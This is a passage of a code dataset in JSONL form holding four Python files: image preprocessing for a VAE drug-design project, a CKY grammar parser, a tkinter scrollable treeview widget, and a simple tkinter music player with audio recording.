+{"seq_id": "21350445198", "text": "import os\nfrom keras.preprocessing import image as image_utils\nfrom PIL import Image\nfrom PIL import ImageFilter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ninp_dir = '/home/margs/Drug dicovery and machine learning/Images_zinc/Train'\ntarget_size = (300, 300)\n\nclasses = os.listdir(inp_dir)\nall_images = []\nall_labels = []\n\ni = 0\nfor idx, c in enumerate(classes):\n img_list = os.listdir(inp_dir + '/' + '12170(80%)')\n print(idx)\n j = 0\n for img in img_list:\n fname = inp_dir + '/' + '12170(80%)' + '/' + img\n image = image_utils.load_img(fname).resize(target_size,Image.ANTIALIAS)\n image = np.array(image.getdata()).reshape(target_size[0], target_size[1], 3)\n image = image.astype('float32')/255\n all_images.append(image)\n all_labels.append(idx)\n #j += 1\n #if j >= 20:\n # break\n #plt.imshow(image)\n #plt.show()\n #i += 1\n #if i >= 50:\n # break\n\n\nall_images = np.array(all_images)\nall_labels = np.array(all_labels)\n\nprint(all_images.shape)\nprint(all_labels.shape)\n\nnp.save('full_x', all_images)\nnp.save('full_y', all_labels)\n\n\n'''\nIGNORE THIS!! THIS IS THE CODE FOR THE MODEL. IT'S NOW AVAILABLE IN keras_VAE.py\nx = Input(shape=original_img_size)\nconv_1 = Conv2D(img_chns,\n kernel_size=(2, 2),\n padding='same', activation='relu')(x)\nconv_2 = Conv2D(filters,\n kernel_size=(2, 2),\n padding='same', activation='relu',\n strides=(2, 2))(conv_1)\nconv_3 = Conv2D(filters,\n kernel_size=num_conv,\n padding='same', activation='relu',\n strides=1)(conv_2)\nconv_4 = Conv2D(filters,\n kernel_size=num_conv,\n padding='same', activation='relu',\n strides=1)(conv_3)\nflat = Flatten()(conv_4)\nhidden = Dense(intermediate_dim, activation='relu')(flat)\n\n# defined as separate layers because they will be reused later\nz_mean = Dense(latent_dim)(hidden)\nz_log_var = Dense(latent_dim)(hidden)\n\ndef sampling(args):\n z_mean, z_log_var = args\n epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),\n mean=0., stddev=epsilon_std)\n return z_mean + K.exp(z_log_var) * epsilon\n\nz = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])\n\n# decoder network\ndecoder_hid = Dense(intermediate_dim, activation='relu')\ndecoder_upsample = Dense(filters * 150 * 150, activation='relu')\n\n#if K.image_data_format() == 'channels_first':\n# output_shape = (batch_size, filters, 150, 150)\n#else:\n# output_shape = (batch_size, 150, 150, filters)\n\noutput_shape = (batch_size, 150, 150, filters)\n\nprint('Output shape 1: ', output_shape)\n\ndecoder_reshape = Reshape(output_shape[1:])\ndecoder_deconv_1 = Conv2DTranspose(filters,\n kernel_size=num_conv,\n padding='same',\n strides=1,\n activation='relu')\ndecoder_deconv_2 = Conv2DTranspose(filters,\n kernel_size=num_conv,\n padding='same',\n strides=1,\n activation='relu')\n\n#if K.image_data_format() == 'channels_first':\n# output_shape = (batch_size, filters, 300, 300)\n#else:\n# output_shape = (batch_size, 300, 300, filters)\n\noutput_shape = (batch_size, 300, 300, filters)\n\nprint('Output shape 2: ', output_shape)\n\ndecoder_deconv_3_upsamp = Conv2DTranspose(filters,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding='valid',\n activation='relu')\ndecoder_mean_squash = Conv2D(img_chns,\n kernel_size=2,\n padding='valid',\n activation='sigmoid')\n\nhid_decoded = decoder_hid(z)\nup_decoded = decoder_upsample(hid_decoded)\nreshape_decoded = decoder_reshape(up_decoded)\ndeconv_1_decoded = decoder_deconv_1(reshape_decoded)\ndeconv_2_decoded = 
decoder_deconv_2(deconv_1_decoded)\nx_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)\nx_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)\n\n# Custom loss layer\nclass CustomVariationalLayer(Layer):\n def __init__(self, **kwargs):\n self.is_placeholder = True\n super(CustomVariationalLayer, self).__init__(**kwargs)\n\n def vae_loss(self, x, x_decoded_mean_squash):\n x = K.flatten(x)\n x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)\n xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)\n kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n return K.mean(xent_loss + kl_loss)\n\n def call(self, inputs):\n x = inputs[0]\n x_decoded_mean_squash = inputs[1]\n loss = self.vae_loss(x, x_decoded_mean_squash)\n self.add_loss(loss, inputs=inputs)\n return x\n\ny = CustomVariationalLayer()([x, x_decoded_mean_squash])\n\n# defining VAE model\nvae = Model(x, y)\n\n#def my_vae_loss(y_true, y_pred):\n# xent_loss = img_rows * img_cols * metrics.binary_crossentropy(K.flatten(y_true), K.flatten(y_pred))\n# kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n# vae_loss = K.mean(xent_loss + kl_loss)\n# return vae_loss\n\nvae.compile(optimizer='rmsprop', loss=None, metrics=['accuracy'])\nvae.summary()\n#working code'''", "repo_name": "MargareV/VAE-for-de-novo-drug-design", "sub_path": "image_preprocess.py", "file_name": "image_preprocess.py", "file_ext": "py", "file_size_in_byte": 5620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 23, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "37181894170", "text": "from bigsky.cfg import Terminal, Nonterminal\nfrom sacremoses import MosesTokenizer\nfrom queue import Queue\nimport copy\nimport json\n\nSAFE = True\n\ndef can_be_nonterminal(nonterminal, nts):\n \"\"\"returns whether a given nonterminal is in a set of nonterminals\"\"\"\n ntl = list(nts)\n for ntt in ntl:\n if ntt[0] == nonterminal:\n return True\n return False\n\ndef cky_alg(words, grammar):\n \"\"\"Based on pseudocode in Jurafsky and Martin.\"\"\"\n \"\"\"Put this in its own function for modularity. Now I can use it to extract the tree(s)\"\"\"\n chart = [[set() for i in range(len(words) + 1)] # n+1 x n+1 matrix of sets\n for j in range(len(words) + 1)]\n for j in range(1, 1 + len(words)):\n rules = grammar.get_rules_with_rhs([Terminal(words[j-1])]) # rules that can make this word\n nts = set([(rule.lhs, -1) for rule in rules]) # set of possible pre-terminals\n chart[j-1][j] = chart[j-1][j] | nts # add that set to table\n for i in range(j-2, -1, -1): # go upwards from here\n for k in range(i+1, j): # and for all possible split points\n nt_pairs = [(x[0], y[0]) # make a list of all possible combinations of constituents\n for x in chart[i][k] # given the break point\n for y in chart[k][j]]\n for nt_pair in nt_pairs: # for each combo,\n rules = grammar.get_rules_with_rhs(nt_pair) # if there's a pair that produces something\n nts = set([(rule.lhs, k) for rule in rules]) # set of rules with their break-point\n chart[i][j] = chart[i][j] | nts # add it to the set of things this could be\n return chart\n\ndef cky_parse(sent, grammar):\n \"\"\"\n returns whether a sentence can be parsed with a given CFG\n (this was the original thing in here)\n \"\"\"\n words = MosesTokenizer().tokenize(sent)\n chart = cky_alg(words, grammar)\n return can_be_nonterminal(Nonterminal(\"S\"), # if I can make a sentence, return it\n chart[0][len(words)]) \n\ndef cky_tree(sent, grammar):\n \"\"\"Returns the parse tree(s) of a given sentence and CFG\"\"\"\n\n # is this exponential time? 
nobody likes that :(\n # determine whether it is, and if so, then try a bottom-up (rather than\n # top-down approach)\n def recursive_helper(target, i, j):\n \"\"\"Builds the tree that turns words i to j into a target nonterminal\"\"\"\n if j-i <= 1: # base case: looking at one word\n return (str(target),words[i])\n nts = list(chart[i][j])\n ans_trees = []\n rules = grammar.get_rules_with_lhs(target)\n for nt in nts: # for each nonterminal in this node\n if nt[0] == target: # if it's what I'm looking for\n for r in rules: # go through all the rules that can make the target\n if (can_be_nonterminal(r.rhs[0], chart[i][nt[1]]) and # and if I can make the constituents\n can_be_nonterminal(r.rhs[1], chart[nt[1]][j])):\n ans_trees.append((str(target), \n recursive_helper(r.rhs[0], i, nt[1]), # add the constituent trees to this list\n recursive_helper(r.rhs[1], nt[1],j))) # of possible trees\n return ans_trees\n\n words = MosesTokenizer().tokenize(sent)\n chart = cky_alg(words, grammar)\n if not can_be_nonterminal(Nonterminal(\"S\"), # first, make sure there _is_ a tree\n chart[0][len(words)]): \n return False\n trees = recursive_helper(Nonterminal(\"S\"), 0, len(words)) # treeificate with that function\n return trees\n \ndef enumerate_cky_trees(sent, grammar):\n trees = cky_tree(sent, grammar)\n if not trees:\n return []\n \n # and now I have a list of trees whose subtrees may include lists of subtrees\n # it would be nice if those were all separated - ie if there are 2 possible\n # parses of a given phrase, we then create two entire trees. I think this is going \n # to be a rather intensive process if we have really ambiguous sentences so I \n # have provided a turn-off flag (split_trees)\n def find_ambiguity(start):\n \"\"\"Searches for an ambiguity and returns a pointer to it\"\"\"\n if len(start) > 1 and type(start) == list: # If this list is long, found it\n return start\n if len(start[0]) <= 2: # If the next thing is a terminal, cant find\n return False\n return (find_ambiguity(start[0][1]) or # else, check the left and the right of my one thing\n find_ambiguity(start[0][2]))\n\n ans_trees = [] # list of unambiguous trees\n wq = Queue() # work queue\n wq.put(trees) # put ambiguous tree in it\n while not wq.empty(): # while there is something in the queue\n t = wq.get() # dequeue, t is pointer to head\n x = find_ambiguity(t) # find an ambiguity if there is one\n if not x: # if not, this tree is done\n ans_trees.append(t)\n else: # if yes, its TREE SPLITTIN' TIME!!\n n = len(x) # how many things am I gonna need to make?\n for i in range(n): # go through each option\n u = copy.deepcopy(t) # make a deep copy of t\n y = find_ambiguity(u) # since find_amb. is deterministic, y should point to the same place as x but in u\n for j in range(n)[::-1]: # get rid of the other options. 
I think just splicing would fail bc \n if j == i: continue # pointers so I'm using list method pop\n y.pop(j)\n wq.put(u) # then add this new tree with the removed ambiguity back onto the queue in case still ambig.\n return ans_trees # potentially needless worrying about duplicates\n\ndef debinarize(tree, grammar):\n '''takes the non-binarized form of the parsing grammar to make the tree a non-binary tree'''\n def only_real_rules(subtree):\n '''recursively gets rid of all nonterminals that dont exist in the original grammar'''\n if type(subtree) == str: # Base Case: strings are always leaves\n return [None, subtree]\n if type(subtree) == list: # at this point there should be no ambiguities so \n subtree = subtree[0] # these lists are pointless\n partial_result = None\n if len(grammar.get_rules_with_lhs(Nonterminal(subtree[0]))) > 0: # Is there a rule for this node in the grammar?\n partial_result = [subtree[0]] + [only_real_rules(subtree[i]) # if so, leave this and recurse downward\n for i in range(1, len(subtree))]\n else:\n partial_result = [None] + [only_real_rules(subtree[i]) # if not, label this NONE and recurse down\n for i in range(1, len(subtree))]\n result = [partial_result[0]] # stick the label on the front of this list\n for i in range(1, len(partial_result)): # for sub-results\n if partial_result[i][0] == None: # if the sub-result is a non-node\n result += partial_result[i][1:] # concatenate that list\n else:\n result.append(partial_result[i]) # otherwise, just add the REAL node\n return result\n\n def unaries(subtree):\n '''\n Recursively adds in unaries where they need to be\n\n I assumed that only one rule in the grammar will create a given string/phrase combo\n But I think I'm allowed to make that assumption. Especially since we control the CFG\n Then to do this we can easily backtrack. 
I DID provide error handling in case of this, \n in which case this algorithm will be broken and probably some kind of dynamic programming\n thing will have to be implemented.\n '''\n if type(subtree) == str: # Base case, strings are boring\n return subtree\n target = Nonterminal(subtree[0]) # save the target node\n rhs_rule = None\n rhs = [Terminal(w) if type(w)==str # figure out what a rule.rhs would look like\n else Nonterminal(w[0]) \n for w in subtree[1:]]\n target_rules = grammar.get_rules_with_lhs(target) # get all the rules that make the target\n try:\n rhs_rule = grammar.get_rules_with_rhs(rhs)[0] # get the rules that make the interior\n except:\n raise KeyError(\"No rule with \\\"\" + \"\".join(subtree[1:]) \n + \"\\\" as right-hand side\")\n subtree[0] = str(rhs_rule.lhs) # replace start node w what DOES make rhs\n result = [subtree[0]] + [unaries(p) for p in subtree[1:]] # recurse downward\n while rhs_rule not in target_rules: # while I am not making the target\n try:\n rhs_rule = grammar.get_rules_with_rhs((rhs_rule.lhs,))[0] # get the rules that make the new interior\n except: # (which is the thing that made the last interior)\n raise KeyError(\"No rule with \\\"\" + \"\".join(subtree[1:])\n + \"\\\" as right-hand side\")\n result = [str(rhs_rule.lhs), result] # step result up\n return result \n \n orr = only_real_rules(tree)\n try:\n return unaries(orr)\n except KeyError:\n print(\"Failed to remove unaries\")\n return orr\n\ndef reformat_tree(t):\n \"\"\"\n Reformats the output of the CKY parser for the following syntax tree viewer:\n \n http://ironcreek.net/syntaxtree/\n \n \"\"\"\n s = json.dumps(t)\n s = s.replace('\",\"', '###')\n s = s.replace('\"', '')\n s = s.replace(',','')\n s = s.replace('[[','[')\n s = s.replace(']]',']')\n s = s.replace('_','')\n s = s.replace('###', ',')\n return s \n\ndef make_trees(sentence, orig_grammar, cnf_grammar=None):\n \"\"\"\n Parses the sentence and returns a list of CKY trees, e.g:\n\n In : make_trees(\"clear tonight.\", grammar)\n Out: [['S', ['WEATHER', 'clear'], ['TIME', ['BTIME', 'tonight']], '.']]\n \n \"\"\"\n if cnf_grammar == None:\n cnf_grammar = orig_grammar.binarize()\n trees = enumerate_cky_trees(sentence, cnf_grammar)\n for i in range(len(trees)):\n trees[i] = debinarize(trees[i], orig_grammar)\n return trees\n", "repo_name": "Mark-Hopkins-at-Williams/bigsky", "sub_path": "bigsky/cky.py", "file_name": "cky.py", "file_ext": "py", "file_size_in_byte": 11774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bigsky.cfg.Terminal", "line_number": 23, "usage_type": "call"}, {"api_name": "sacremoses.MosesTokenizer", "line_number": 42, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 44, "usage_type": "call"}, {"api_name": "sacremoses.MosesTokenizer", "line_number": 70, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 72, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 75, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 98, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 108, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 125, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 151, "usage_type": "call"}, {"api_name": "bigsky.cfg.Terminal", "line_number": 153, "usage_type": "call"}, {"api_name": "bigsky.cfg.Nonterminal", "line_number": 154, "usage_type": "call"}, 
{"api_name": "json.dumps", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "8282390225", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nimport uuid\nfrom customtkinter import *\nimport pollenisatorgui.core.components.utils as utils\nfrom pollenisatorgui.core.components.settings import Settings\nfrom pollenisatorgui.core.application.paginable import Paginable\nimport pyperclip\n\n\nclass ScrollableTreeview(Paginable):\n def __init__(self, root, columns, **kwargs):\n if not kwargs.get(\"paginate\", True):\n maxPerPage = -1\n else:\n maxPerPage = kwargs.get(\"maxPerPage\", 10)\n super().__init__(root, self.insert_items, self.empty_treeview, self.callback_get_value, lambda: 0, height=0, maxPerPage=maxPerPage)\n self.root = root\n self.columns = columns\n self._detached = set()\n self.sort_keys = kwargs.get(\"sort_keys\", None)\n self.content_view = self.getContentView()\n self.treevw = ttk.Treeview(self.content_view, style=kwargs.get(\"style\",None), height=kwargs.get(\"height\", 10))\n self.treevw['columns'] = columns\n settings = Settings()\n self.treevw.tag_configure(\"odd\", background=utils.getBackgroundSecondColor())\n lbl = CTkLabel(self)\n self.f = tk.font.Font(lbl, \"Sans\", bold=True, size=10)\n self.columnsLen = [self.f.measure(column) for column in self.columns]\n listOfLambdas = [self.column_clicked(\"#\"+str(i), False) for i in range(len(self.columns))]\n for h_i, header in enumerate(self.columns):\n self.treevw.heading(\"#\"+str(h_i), text=header, anchor=\"w\", command=listOfLambdas[h_i])\n self.treevw.column(\"#\"+str(h_i), anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[h_i]) # ,width=self.columnsLen[h_i]\n self.treevw.grid(row=0, column=0, sticky=tk.NSEW)\n for bindName, callback in kwargs.get(\"binds\", {}).items():\n self.treevw.bind(bindName, callback)\n scbVSel = CTkScrollbar(self.content_view,\n orientation=tk.VERTICAL,\n command=self.treevw.yview)\n scbHSel = CTkScrollbar(\n self.content_view, orientation=tk.HORIZONTAL, command=self.treevw.xview)\n self.treevw.configure(yscrollcommand=scbVSel.set)\n self.treevw.configure(xscrollcommand=scbHSel.set)\n scbVSel.grid(row=0, column=1, sticky=tk.NS)\n scbHSel.grid(row=1, column=0, sticky=tk.EW)\n self.setPaginationPanel()\n \n \n self.treevw.bind(\"\", self.copy)\n self.treevw.bind('', self.selectAll)\n self.treevw.bind(\"\", self.unselect)\n self._initContextualMenu(self.treevw)\n\n def empty_treeview(self):\n for item in self.treevw.get_children():\n self.treevw.delete(item)\n\n def unselect(self, event=None):\n for item in self.treevw.selection():\n self.treevw.selection_remove(item)\n \n def callback_get_value(self, item, column):\n if column == 0:\n return item[\"text\"]\n else:\n return item[\"values\"][column-1]\n\n def selectAll(self, event=None):\n self.treevw.selection_set(self.treevw.get_children())\n\n def bind(self, event_name, func):\n self.treevw.bind(event_name, func)\n\n def insert(self, parent, index, iid, text=\"\",values=(), tags=(), image=None):\n res = None\n if iid is None:\n iid = uuid.uuid4()\n if iid not in [x[\"iid\"] for x in self.infos]:\n res = self.addPaginatedInfo({\"parent\":parent,\"iid\":iid, \"index\":index, \"text\":text,\"values\":values,\"tags\":tags, \"image\":image})\n return res\n \n def insert_items(self, items):\n res = None\n for t in items:\n res = self._insert(t[\"parent\"], t[\"index\"], t[\"iid\"], t[\"text\"], t[\"values\"], t[\"tags\"], t[\"image\"])\n return res\n \n def _insert(self, parent, index, iid, text=\"\",values=(), tags=(), image=None):\n kwargs = {}\n if image is not None:\n kwargs[\"image\"] =image\n try:\n 
res = self.treevw.insert(parent, index, iid, text=text, values=values, tags=tags, **kwargs)\n except tk.TclError as e:\n return None\n self.columnsLen[0] = max(self.columnsLen[0], self.f.measure(text))\n self.treevw.column(\"#0\", anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[0], width=self.columnsLen[0])\n for i, val in enumerate(values):\n self.columnsLen[i+1] = min(1000, max(self.columnsLen[i+1], self.f.measure(str(val))))\n self.treevw.column(\"#\"+str(i+1), anchor='w',\n stretch=tk.YES, minwidth=self.columnsLen[i+1], width=self.columnsLen[i+1])\n self.resetOddTags()\n return res\n\n def item(self, iid, **kwargs):\n try:\n self.treevw.item(iid, **kwargs)\n except tk.TclError as e:\n pass\n try:\n self.infos[[str(x[\"iid\"]) for x in self.infos].index(iid)].update(kwargs)\n except ValueError as e:\n raise tk.TclError(e)\n return self.infos[[str(x[\"iid\"]) for x in self.infos].index(iid)]\n \n \n def _initContextualMenu(self, parent):\n \"\"\"Initialize the contextual menu for paperclip.\n Args:\n parent: the tkinter parent widget for the contextual menu\n \"\"\"\n self.contextualMenu = utils.craftMenuWithStyle(parent)\n parent.bind(\"\", self.popup)\n self.contextualMenu.add_command(label=\"Copy\", command=self.copy)\n self.contextualMenu.add_command(label=\"Close\", command=self.close)\n\n \n def addContextMenuCommand(self, label, command, replace=False):\n found = False\n for i in range(self.contextualMenu.index('end')+1):\n labelStr = str(self.contextualMenu.entrycget(i,'label') )\n if labelStr == label and not replace:\n found = True\n break\n if not found:\n self.contextualMenu.add_command(label=label, command=command)\n\n def close(self):\n \"\"\"Option of the contextual menu : Close the contextual menu by doing nothing\n \"\"\"\n pass\n\n def copy(self, _event=None):\n \"\"\"Option of the contextual menu : Copy entry text to clipboard\n \"\"\"\n selected = self.treevw.selection()\n texts = []\n for item in selected:\n it = self.item(item)\n texts.append(it.get(\"text\", \"\") + \" \" +\n \" \".join(map(str,it.get(\"values\", []))))\n\n pyperclip.copy(\"\\n\".join(texts))\n\n def popup(self, event):\n \"\"\"\n Fill the self.widgetMenuOpen and reraise the event in the editing window contextual menu\n\n Args:\n event: a ttk Treeview event autofilled.\n Contains information on what treeview node was clicked.\n \"\"\"\n self.widgetMenuOpen = event.widget\n self.contextualMenu.tk_popup(event.x_root, event.y_root)\n self.contextualMenu.focus_set()\n self.contextualMenu.bind('', self.popupFocusOut)\n\n def popupFocusOut(self, _event=None):\n \"\"\"Callback for focus out event. 
Destroy contextual menu\n Args:\n _event: not used but mandatory\n \"\"\"\n self.contextualMenu.unpost()\n\n \n\n \n\n def detach(self, item_id):\n try:\n self.treevw.detach(item_id)\n self._detached.add(item_id)\n except tk.TclError:\n pass\n\n def reattach(self, item_id, parent, index):\n try:\n self.treevw.reattach(item_id, parent, index)\n self._detached.discard(item_id)\n except tk.TclError:\n pass\n \n @classmethod\n def date_compare(cls, start, end, toCompare):\n dated = utils.stringToDate(start)\n datef = utils.stringToDate(end)\n toCompare = utils.stringToDate(toCompare)\n if dated is None or datef is None:\n return True\n return dated <= toCompare <= datef\n\n def column_clicked(self, col, reverse):\n \"\"\"A lambda to call the statusbarController.statusbarClicked with the tag name clicked\n Args:\n name: the tag name clicked\n \"\"\"\n return lambda : self.sort_column(self.treevw, col, reverse)\n\n def sort_column(self, tv, col, reverse):\n sort_key = None\n if self.sort_keys:\n sort_key = self.sort_keys[int(col[1:])]\n if sort_key is None:\n sort_key = str\n if col == \"#0\":\n self.infos.sort(key=lambda info: sort_key(info[\"text\"]), reverse=reverse)\n else:\n self.infos.sort(key=lambda info: sort_key(str(info[\"values\"][int(col[1:])-1])), reverse=reverse)\n tv.heading(col, command=self.column_clicked(col, not reverse))\n self.goToPage(\"first\", force=True)\n\n def reset(self):\n \"\"\"Reset the treeview values (delete all lines)\"\"\"\n for item in self.treevw.get_children():\n self.treevw.delete(item)\n self.infos = []\n self._detached = set()\n self.resetPagination()\n\n\n def resetOddTags(self):\n for i, child in enumerate(self.treevw.get_children()):\n odd_tag = (\"odd\") if i%2 != 0 else ()\n current_tags = self.item(child)[\"tags\"]\n current_tags = [current_tags] if isinstance(current_tags, str) else list(current_tags)\n if \"odd\" in current_tags:\n current_tags.remove(\"odd\")\n self.item(child, tags=[odd_tag]+current_tags)\n\n def delete(self, _event=None):\n \"\"\"Callback for event\n Remove the selected item in the treeview\n Args:\n _event: not used but mandatory\"\"\"\n for selected in self.treevw.selection():\n try:\n item = self.item(selected)\n if item[\"text\"].strip() != \"\":\n self.treevw.delete(selected)\n try:\n ind = [x[\"iid\"] for x in self.infos].index(selected)\n del self.infos[ind]\n except ValueError as e:\n pass\n except tk.TclError:\n pass\n self.resetOddTags()\n\n def selection(self):\n return self.treevw.selection()\n \n def get_children(self, all=False):\n if all:\n return [x[\"iid\"] for x in self.infos]\n return self.treevw.get_children()\n \n def identify(self, *args, **kwargs):\n return self.treevw.identify(*args, **kwargs)\n \n def identify_column(self, *args, **kwargs):\n return self.treevw.identify_column(*args, **kwargs)\n\n def parent(self, item):\n return self.treevw.parent(item)\n\n \n\n ", "repo_name": "fbarre96/PollenisatorGUI", "sub_path": "pollenisatorgui/core/application/scrollabletreeview.py", "file_name": "scrollabletreeview.py", "file_ext": "py", "file_size_in_byte": 10684, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pollenisatorgui.core.application.paginable.Paginable", "line_number": 11, "usage_type": "name"}, {"api_name": "tkinter.ttk.Treeview", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 23, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.settings.Settings", 
"line_number": 25, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils.getBackgroundSecondColor", "line_number": 26, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "tkinter.font.Font", "line_number": 28, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tkinter.NSEW", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tkinter.VERTICAL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tkinter.NS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tkinter.EW", "line_number": 46, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 78, "usage_type": "call"}, {"api_name": "tkinter.TclError", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tkinter.YES", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 115, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils.craftMenuWithStyle", "line_number": 124, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 124, "usage_type": "name"}, {"api_name": "pyperclip.copy", "line_number": 155, "usage_type": "call"}, {"api_name": "tkinter.TclError", "line_number": 185, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 192, "usage_type": "attribute"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 197, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 197, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 198, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 198, "usage_type": "name"}, {"api_name": "pollenisatorgui.core.components.utils.stringToDate", "line_number": 199, "usage_type": "call"}, {"api_name": "pollenisatorgui.core.components.utils", "line_number": 199, "usage_type": "name"}, {"api_name": "tkinter.TclError", "line_number": 257, "usage_type": "attribute"}]}
+{"seq_id": "25826712794", "text": "import tkinter as tk\r\nimport pygame\r\nimport pyaudio\r\nimport wave\r\n\r\n\r\n#Initialize pygame\r\npygame.mixer.init()\r\n\r\n#This will open up a pygame display window when program is run\r\n# pygame.display.set_mode((400, 300)) \r\n\r\n#Create the main window\r\nwindow = tk.Tk()\r\n\r\n#Set the size of the window\r\nwindow.geometry('600x300')\r\n\r\n#All window to be resizable by user\r\nwindow.resizable(True,True)\r\n\r\n#Set title of GUI window\r\nwindow.title(\"Music Player\")\r\n\r\n#Load the music file\r\npygame.mixer.music.load('music.mp3')\r\n\r\n# Create the play button\r\ndef play():\r\n pygame.mixer.music.play()\r\nplay_button = tk.Button(window, text=\"Play\", command=play)\r\nplay_button.pack(expand=1,fill=tk.BOTH)\r\n# play_button.place(x=0,y=0)\r\n\r\n# Create the fade out button\r\ndef fadeout():\r\n pygame.mixer.music.fadeout(3000)\r\nfadeout_button = tk.Button(window, text=\"Fade Out\", command=fadeout)\r\nfadeout_button.pack(expand=1,fill=tk.BOTH)\r\n# fadeout_button.place(x=320,y=0)\r\n\r\n# Create the pause button\r\ndef pause():\r\n pygame.mixer.music.pause()\r\npause_button = tk.Button(window, text=\"Pause\", command=pause)\r\npause_button.pack(expand=1,fill=tk.BOTH)\r\n# pause_button.place(x=160,y=0)\r\n\r\n# Create the unpause button\r\ndef unpause():\r\n pygame.mixer.music.unpause()\r\nunpause_button = tk.Button(window, text=\"Unpause\", command=unpause)\r\nunpause_button.pack(expand=1,fill=tk.BOTH)\r\n# unpause_button.place(x=240,y=0)\r\n\r\n# Create the stop button\r\ndef stop():\r\n pygame.mixer.music.stop()\r\nstop_button = tk.Button(window, text=\"Stop\", command=stop)\r\nstop_button.pack(expand=1,fill=tk.BOTH)\r\n# stop_button.place(x=80,y=0)\r\n\r\n# Initialize pyadio\r\np = pyaudio.PyAudio()\r\n\r\ndef record_audio():\r\n # Open a wave file to write the audio\r\n audio_file = wave.open('audio.wav', 'wb')\r\n audio_file.setnchannels(1)\r\n audio_file.setsampwidth(p.get_sample_size(pyaudio.paInt16))\r\n audio_file.setframerate(44100)\r\n\r\n # Start recording\r\n stream = p.open(format=pyaudio.paInt16, channels=1, rate=44100, input=True, frames_per_buffer=1024)\r\n audio_data = stream.read(44100)\r\n audio_file.writeframes(audio_data)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_file.close()\r\n\r\n# Create a function to play audio\r\ndef play_audio():\r\n # Open the wave file\r\n audio_file = wave.open('audio.wav', 'rb')\r\n \r\n # Start playback\r\n stream = p.open(format=p.get_format_from_width(audio_file.getsampwidth()),\r\n channels=audio_file.getnchannels(),\r\n rate=audio_file.getframerate(),\r\n output=True)\r\n audio_data = audio_file.readframes(1024)\r\n while audio_data:\r\n stream.write(audio_data)\r\n audio_data = audio_file.readframes(1024)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_file.close()\r\n\r\n# Create a record button\r\nrecord_button = tk.Button(window, text=\"Record\", command=record_audio)\r\nrecord_button.pack(expand=1,fill=tk.BOTH)\r\n\r\n# Create a play button\r\nplay_recording = tk.Button(window, text=\"Play Recording\", command=play_audio)\r\nplay_recording.pack(expand=1,fill=tk.BOTH)\r\n\r\n# Run the main event loop\r\nwindow.mainloop() ", "repo_name": "thatwonguy/GUIs", "sub_path": "music_player/music_player.py", "file_name": "music_player.py", "file_ext": 